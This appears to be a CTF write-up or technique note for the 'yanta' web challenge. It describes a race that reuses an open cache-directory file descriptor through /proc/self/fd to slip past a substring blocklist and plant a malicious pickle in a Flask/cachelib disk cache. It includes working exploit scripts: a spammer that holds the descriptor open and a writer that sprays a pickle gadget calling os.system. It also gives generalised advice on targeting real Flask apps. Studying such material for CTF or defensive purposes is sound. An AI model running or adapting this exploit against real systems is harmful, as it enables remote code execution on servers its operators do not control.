Note
Race a still-open cache-directory FD through /proc/self/fd to plant a malicious pickle, then force code execution on the next cache read.
FileSystemCache Race + Pickle via /proc/self/fd
FileSystemCache (Flask-Caching → cachelib) stores cache entries on disk as
struct.pack("I", expiry) followed by a pickle dump, under a filename that is just
md5(key_prefix + key). If you can write one arbitrary file into the cache directory, the next cache
read does pickle.load() on your bytes → RCE.
The interesting part is how you write into a directory protected by a string blocklist. When the app
opens the cache directory as a file descriptor first and resolves the target filename relative to that
FD later (os.open(..., dir_fd=dirfd)), that open FD is a reusable capability. While it is open you
can reach it from another concurrent request as /proc/self/fd/<n>/<filename> — which contains neither
.. nor the literal string cache, so naive path filters never see it.
Why It Works
- The cachelib serializer is pickle by default, so a crafted cache file is arbitrary code execution on load — not just data corruption.
- This is not plain path traversal. The primitive is "open the directory now, resolve the filename
later against that FD".
/proc/self/fd/<n>is a live symlink to the already-opened directory, so the string you submit never has to mention the real path. - A concurrent worker model + a slow/large write keeps that directory FD open long enough to race a second request against it.
Vulnerable Pattern
A custom render-cache that opens the cache dir, renders, then writes the file via dir_fd. From the
Yanta challenge (rendercache.py):
def render_and_cache(self, name, body):
fc = self._cache.cache
fname = os.path.basename(fc._get_filename(self._key(name))) # md5("note:"+name)
dirfd = os.open(fc._path, os.O_RDONLY | os.O_DIRECTORY) # FD -> /data/cache (held open)
out = render_text(body.decode("utf-8"))
fd = os.open(fname, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o644, dir_fd=dirfd)
with os.fdopen(fd, "wb") as f:
f.write(struct.pack("I", int(time.time()) + self.ttl)) # 4-byte expiry header
fc.serializer.dump(out, f) # pickle dump
os.close(dirfd)
return out
The note routes let you POST raw bytes to an arbitrary name, guarded only by a substring blocklist
(storage.py / views.py):
BLOCKED = ("..", "cache")
def check_title(title):
low = title.lower()
for tok in BLOCKED:
if tok in low:
abort(403, f"title rejected: {tok!r} is not allowed")
# POST /note?name=<title> -> save_note writes request body verbatim to NOTES_DIR/<title>
def save_note(title, body):
path = _note_path(title) # os.path.join("/data/notes", title)
parent = os.path.dirname(path)
if parent: os.makedirs(parent, exist_ok=True)
with open(path, "wb") as f:
f.write(body)
os.path.join("/data/notes", "/proc/self/fd/12/<md5>") returns the absolute second argument, so the
write lands in /proc/self/fd/12/<md5> → i.e. /data/cache/<md5>. /data is writable (777) and the
string dodges the blocklist.
The concurrency comes from the gunicorn launch (Dockerfile):
gunicorn -w 1 --threads 8 --timeout 60 -b 0.0.0.0:8000 wsgi:app
One process (so /proc/self/fd is shared) but 8 threads → requests run concurrently → you can hit the
open directory FD from another thread.
Cache filename derivation
key_prefix = "note:"
# filename = md5(key_prefix + name)
>>> import hashlib; hashlib.md5(b"note:welcome.txt").hexdigest()
'6400cc4589432cfd24676ffc62c5e3c1' # matches /data/cache/6400cc45...
So the cache file for a note you'll later read as name=cnf409 is md5("note:cnf409").
Exploit Flow
- Derive the target cache filename:
md5("note:" + READ_NAME). - Build the malicious file =
struct.pack("I", now+ttl)+pickle.dumps(gadget), matching the exact on-disk format cachelib expects. - Spammer: continuously POST large notes and GET them to force
render_and_cache, keeping a directory FD to/data/cacheopen as often as possible (the big serialize/write widens the window). - Writer: spray POSTs to
name=/proc/self/fd/<n>/<md5>across plausible FD numbers (the dir FD was observed around fd 11–13; spray ~7–16). One of them resolves into/data/cacheand writes your file. - Force a cache read of
READ_NAMEso the apppickle.load()s your file → code runs.
Worked Exploit
Spammer — holds the cache-dir FD open by writing/reading 1 MB notes in a loop:
import requests, time
URL = "http://localhost:8000/"
i = 0
while True:
name = f"spam_{i}.txt"; i += 1
requests.post(URL + f"note?name={name}", data="r" * 1_000_000) # large body = slow write
requests.get(URL + f"note?name={name}") # GET triggers render_and_cache
time.sleep(0.01)
Writer — plant the pickle through the open FD, then trigger the load:
import requests, hashlib, pickle, struct, time
URL = "http://localhost:8000/"
READ = "cnf409"
MD5 = hashlib.md5(f"note:{READ}".encode()).hexdigest()
class RCE:
def __reduce__(self):
import os
return (os.system, ("/getflag > /tmp/out; chmod 666 /tmp/out",))
# rebuild the exact cache-entry format: 4-byte expiry header + pickle payload
payload = struct.pack("I", int(time.time()) + 600) + pickle.dumps(RCE())
while True:
for fd in range(7, 17): # dir FD is usually ~11-13, spray a range
r = requests.post(URL + f"note?name=/proc/self/fd/{fd}/{MD5}", data=payload)
if r.status_code == 200:
# cache miss -> render_and_cache? No: a present file makes get() pickle.load() it
requests.get(URL + f"note?name={READ}") # forces cache.get() -> pickle.load() -> RCE
requests.get(URL + f"note?name={READ}")
raise SystemExit(f"fired via fd {fd}")
Run the spammer in the background, then the writer. On success the gadget executes; here it runs the
suid /getflag helper and stashes the flag in /tmp/out.
Variations
- If the read key is not directly controllable, poison a predictable entry instead (cached homepage /
dashboard view, e.g. cachelib keys like
view//<path>). - If the serializer is no longer pickle, the file write is still useful: stale-content poisoning, HTML injection into a cached page, or feeding a second-stage parser.
- The
dir_fdcapability trick generalizes to any "open dir/file now, resolve a user string against it later" pattern, not just caches.
Common Blockers
- The on-disk format must be exact — cachelib prepends the 4-byte little-endian expiry before the pickle. Get the header wrong and the load fails before reaching your gadget.
- Worker/thread model matters: the second request must share the
/proc/self/fdnamespace of the process holding the directory FD (single multi-threaded process is ideal; multiple processes need the FD held in the same worker you hit). - The FD number drifts — spray a small range and/or re-derive it from
/proc/<pid>/fdif you have any read primitive.
Good Situations To Use It
- A Flask/cachelib app caching rendered pages to disk with user-influenced keys and a default (pickle) serializer.
- Deterministic cache filenames (
md5(prefix+key)) you can compute offline. - A slow/large endpoint and concurrency to keep the cache-directory FD open during the race.
Sources
midnight_flag_finals_2026/web/yanta- cachelib FileSystemCache format: https://github.com/pallets-eco/cachelib/blob/main/src/cachelib/file.py